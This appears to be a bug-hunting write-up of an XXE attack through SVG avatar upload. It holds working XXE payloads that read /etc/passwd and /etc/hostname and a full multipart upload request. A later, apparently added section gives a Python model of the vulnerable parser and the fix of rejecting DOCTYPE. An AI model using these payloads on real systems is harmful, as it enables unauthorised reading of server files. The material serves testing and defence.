Write-up: XXE-File-upload ( SVG )

Baby paws:

  1. I looked at what functionalities are available in the web app, just to see what the possible attack vectors are.
  2. I analyzed the WAF and found what triggers it and which characters are blocked.
  3. I found an upload field that explicitly allows these three formats: PNG, XML, and EPS, i.e. the upload field for the avatar. That allowed me to check for ImageTragick, Ghostscript and some fuckery over file uploads! So I was looking for some shells, HTB style.
  4. I ruled out the first two and was doing more recon, then I started doing some XXE things to the SVGs.
  5. So let's start. I tried something like this first:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>

#FAILED

But god knows we tried :)

So let's add some attributes to this:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="512px" height="512px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="14" x="0" y="16">&xxe;</text></svg>

Son of a bitch, I'm in. Request:

POST /redacted/redacted/and/redacted HTTP/1.1
Host: redacted.site
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Cookie: session=blehhhhh
Content-Type: multipart/form-data; boundary=---------------------------177039707011430280861789912306

-----------------------------177039707011430280861789912306
Content-Disposition: form-data; name="csrf"

5
-----------------------------177039707011430280861789912306
Content-Disposition: form-data; name="avatar"; filename="your-weekend-is-lost-you-blue-team-beta.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

-----------------------------177039707011430280861789912306--

Response:

HTTP/1.1 302 Found
Location: /avatar/change/confirmation/redacted
Connection: close
Content-Length: 0

and I see my avatar is not visible, but the DOM of the site shows something like:

<img src="/redacted/moreRedacted/avatarUser.svg" class="avatar">

Then I opened the image by copying the path and ENDORPHINS IN! The feeling of winning an argument with your SO and them apologizing continues.
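To make the difference between the two payloads concrete, here is an added example (my own code, not the author's payloads being re-run and not the target's code) that models, in Python's standard-library expat binding, a server-side SVG renderer which only "draws" character data found inside SVG <text> elements. It is one plausible model of why the bare <svg>&xxe;</svg> shows nothing while the namespaced <text> version leaks: in the bare case the SYSTEM entity is still fetched (a blind read), it just never lands anywhere that gets rendered. The passwd-style content, the temp-file URI used in place of file:///etc/passwd, and the rendering rule are constructed assumptions; real rasterizers (librsvg, ImageMagick, Batik, ...) differ, so verify against the actual stack.

```python
# Added example, not from the original write-up: toy SVG "renderer" built on
# the stdlib expat parser. It shows (1) the blind hit of the bare payload,
# (2) the leak of the <text> payload, (3) the same parser with external
# entities skipped, and (4) DOCTYPE rejected outright (the recommended fix).
import os
import pathlib
import tempfile
import urllib.parse
import urllib.request
import xml.parsers.expat

SVG_NS = "http://www.w3.org/2000/svg"
TEXT_ELEMENT = f"{SVG_NS} text"  # expat reports "<namespace> <localname>"


def build_bare_payload(target_uri):
    """First attempt from the write-up: entity referenced directly under <svg>."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{target_uri}"> ]>'
        '<svg>&xxe;</svg>'
    )


def build_svg_payload(target_uri, width=512, height=512, font_size=14):
    """Second attempt: namespaced SVG with the entity inside a <text> node."""
    return (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{target_uri}" > ]>'
        f'<svg width="{width}px" height="{height}px" xmlns="{SVG_NS}" '
        'xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">'
        f'<text font-size="{font_size}" x="0" y="16">&xxe;</text></svg>'
    )


def render_svg_text(svg_bytes, *, resolve_external, reject_dtd):
    """Return the characters a naive renderer would draw: only character data
    inside SVG <text> elements counts.
    resolve_external=True  -> SYSTEM entities are fetched and spliced in (the bug)
    resolve_external=False -> the reference is skipped, nothing leaks
    reject_dtd=True        -> any DOCTYPE aborts the parse with ValueError
    """
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")
    drawn = []
    depth = 0  # number of <text> elements currently open

    def start(name, attrs):
        nonlocal depth
        if name == TEXT_ELEMENT:
            depth += 1

    def end(name):
        nonlocal depth
        if name == TEXT_ELEMENT:
            depth -= 1

    def chars(data):
        if depth:
            drawn.append(data)

    def external_ref(context, base, system_id, public_id):
        # Vulnerable behaviour: load whatever the SYSTEM id points at and parse
        # it as the entity's replacement text. Only file:// is modelled here.
        url = urllib.parse.urlparse(system_id)
        if url.scheme != "file":
            return 0  # expat raises instead of fetching over the network
        with open(urllib.request.url2pathname(url.path), "rb") as fh:
            child = parser.ExternalEntityParserCreate(context)
            child.Parse(fh.read(), True)  # child inherits our handlers
        return 1

    def doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError("DOCTYPE is not allowed in an uploaded SVG")

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    if resolve_external:
        parser.ExternalEntityRefHandler = external_ref
    if reject_dtd:
        parser.StartDoctypeDeclHandler = doctype
    parser.Parse(svg_bytes, True)
    return "".join(drawn)


def make_demo_secret(content="root:x:0:0:root:/root:/bin/bash\n"):
    """Write a constructed stand-in for /etc/passwd; return (file:// URI, content)."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(content)
    return pathlib.Path(path).as_uri(), content


def demo():
    uri, secret = make_demo_secret()
    bare = build_bare_payload(uri).encode()
    full = build_svg_payload(uri).encode()
    results = {
        "bare_vulnerable": render_svg_text(bare, resolve_external=True, reject_dtd=False),
        "text_vulnerable": render_svg_text(full, resolve_external=True, reject_dtd=False),
        "text_no_external": render_svg_text(full, resolve_external=False, reject_dtd=False),
    }
    try:
        render_svg_text(full, resolve_external=False, reject_dtd=True)
        results["text_reject_dtd"] = "parsed (unexpected)"
    except ValueError as exc:
        results["text_reject_dtd"] = f"rejected: {exc}"
    results["leaked"] = results["text_vulnerable"] == secret
    os.remove(urllib.request.url2pathname(urllib.parse.urlparse(uri).path))
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Running demo() gives an empty string for the bare payload even though the file was read, the full secret for the <text> payload, an empty string once external entities are not resolved, and a ValueError as soon as a DOCTYPE appears. The last mode is the one to ship: refuse any DOCTYPE in uploaded SVG before it reaches whatever rasterizes or re-serves it, rather than relying on every downstream parser having external entities disabled.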